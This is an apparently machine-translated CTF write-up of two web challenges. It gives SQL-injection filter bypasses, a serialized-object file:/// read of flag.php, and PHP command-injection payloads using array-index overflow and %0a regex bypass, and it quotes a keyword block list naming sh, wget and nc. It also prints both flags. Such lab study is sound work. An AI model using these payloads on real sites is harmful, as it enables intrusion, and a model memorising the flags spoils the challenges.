当前位置:网站首页>[attack and defense world web] difficulty Samsung 9-point introductory question (end): Fakebook, favorite_ number
[attack and defense world web] difficulty Samsung 9-point introductory question (end): Fakebook, favorite_ number
2022-07-23 18:38:00 【Black zone (rise)】
Catalog
7、 ... and 、fakebook
How to solve the problem :
1、 Look for the injection point , Found deserialization function , And serialized content , Guess the file location
The process :
see robots.txt file
It is found that it is a backup file
Regular matching : stay blog To match to https://
Now go to register
This 1 Can point
It was found that the transmission was carried out
Consider whether there is :
Inject
File contains
Fake protocol
……
Input single quotation mark error
But it cannot be closed
Try another way
add and 1=1
( Echo normal )
Input and 1=2
( Report errors )
There are injection points
Check the number of fields
order by 4
( Echo normal )
order by 5
( Report errors )
So there is 4 A field
Judge the echo point
Try to bypass
/**/union/**/ select /**/1,2,3,4
Find out 2 Is echo point
Burst the database
/**/union/**/ select/**/ 1,database(),3,4
The database for fakebook
Explosion meter
-1 /**/union /**/ select/**/ 1,group_concat(table_name) ,3,4 from information_schema.tables where table_schema=database()#
To obtain the users surface
Pop field
-1 /**/union /**/ select/**/ 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema="fakebook"#
Burst data
-1 /**/union /**/ select/**/ 1,group_concat(no,'~',data) ,3,4 from fakebook.users#
No useful information
Suddenly focus on the deserialization function , And this path has appeared many times
File path
/var/www/html/view.php
that flag The path of may also be
/var/www/html/flag.php
Because there is a deserialization function , So we should inject serialization statements
Use file:/// Protocol to access local computer files
-1 /**/union /**/ select /**/1,2 ,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:18;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#
But it doesn't show flag.php Content
quite a lot flag None of them , And in the source code ,Ctrl+U View source code
Found a paragraph base64 Encrypted characters
PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tjMWU1NTJmZGY3NzA0OWZhYmY2NTE2OGYyMmY3YWVhYn0iOw0KZXhpdCgwKTsNCg==
Decrypted as
flag{c1e552fdf77049fabf65168f22f7aeab}
8、 ... and 、favorite_number
How to solve the problem :
1、 Source code analysis , Bypass the filter ,flag Find a way
The process :
After entering, it is php Code
Code 1: Array
Use $_POST["stuff"] Receive array
And limit $stuff[0] != 'admin'
Array index overflow can be used to bypass
stuff[2^32]=admin
$stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"];Code 2: Regular matching
"/^\d+$/im": Match a string of numbers , No other characters are allowed
/m: Multi-line matching , One line matches successfully ,preg_match return true
A newline :0x0a(ascii code ),%0a(URL code )
if (preg_match("/^\d+$/im",$num)){Code 3: Filter keywords
if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){1、 Array : Numeric subscript overflow bypasses
2、 Regular matching :%0a Multi line bypass
3、 Keyword filtering : You can splice other commands &&(ascii code 0x26,URL code %26)
structure payload:
stuff[4294967296]=admin&stuff[1]=user&num=123%0als
Use bp Grab the bag
Found through HackBar The submitted content is encoded
Use bp Change it back to the original payload
And then send
Start looking for flag
Look first flag Of inode Index point of
payload:
stuff[4294967296]=admin&stuff[1]=user&num=123%0als -i /
Re pass HackBar Submit , Change the package again
18497049 flag
Read flag
payload:
stuff[4294967296]=admin&stuff[1]=user&num=123%0atac `find / -inum 18497049`
Re pass HackBar Submit , Change the package again
It's overtime
Another way
Because there is no filter $, Try splicing with variables
payload:
stuff[4294967296]=admin&stuff[1]=user&num=1%0aa=f;b=lag;tac /$a$b;
cyberpeace{7d870124ba11eacef73c2c409588eadf}
边栏推荐
- MySQL性能调优
- 【2020】【论文笔记】基于二维光子晶体的光控分光比可调Y——
- Flutter operation mode
- 到底适不适合学习3D建模?这5点少1个都不行
- Is learning next generation modeling a good scene or a good role? Choose the right profession and pay more than half
- 【游戏建模模型制作全流程】ZBrush武器模型制作:弩
- [easy to understand] relational schema paradigm decomposition tutorial 3NF and BCNF formula! Xiaobai can also understand "suggestions collection"
- 零基础要学建模该从何开始?如何才能学好游戏建模?
- 零一的昔日织-2022
- PCL:多直线拟合(RANSAC)
猜你喜欢
到底适不适合学习3D建模?这5点少1个都不行
20220721 积分环节的时频域分析
使用kail破解wifi密码
How does Apache, the world's largest open source foundation, work?
DDD: how to use domain driven design to avoid writing journal code
【JZOF】13機器人的運動範圍
Simply understand why the first EVM equivalent zkevm polygon is fully betting
【2022】【论文笔记】太赫兹量子阱——
【游戏建模模型制作全流程】用ZBrush制作游戏士兵角色
一文详解:TMP1750芯片 三通道线性LED驱动器
随机推荐
Modeling just learning is very confused. How to learn the next generation role modeling process?
Is 3D modeling promising? Is employment guaranteed with high salary or is it more profitable to take orders in sideline industry
[sharing game modeling model making skills] how ZBrush adjusts the brush size
Detailed explanation of common curl commands and parameters
Analysis on the implementation of Flink exactly once delivery
[toggle 30 days of ML] Diabetes genetic risk detection challenge (2)
Great God "magic change" airpods, equipped with usb-c interface, 3D printing shell makes maintenance easier
建模刚学习很迷茫,次世代角色建模流程具体该怎么学习?
Spark 安装与启动
Problems and methods of creating multiple projects under one solution in VS2010
Common problems of sklearn classifier
JS 将伪数组转换成数组
LM393低功耗双电压比较器参数、引脚、应用详解
Modeling at the beginning of learning is very confused, how to learn next generation role modeling?
Problems encountered in the project and Solutions
一文了解 NebulaGraph 上的 Spark 项目
How does Apache, the world's largest open source foundation, work?
类的基础
Boss online replay: the mistake I made when training Dall · e
MySQL performance tuning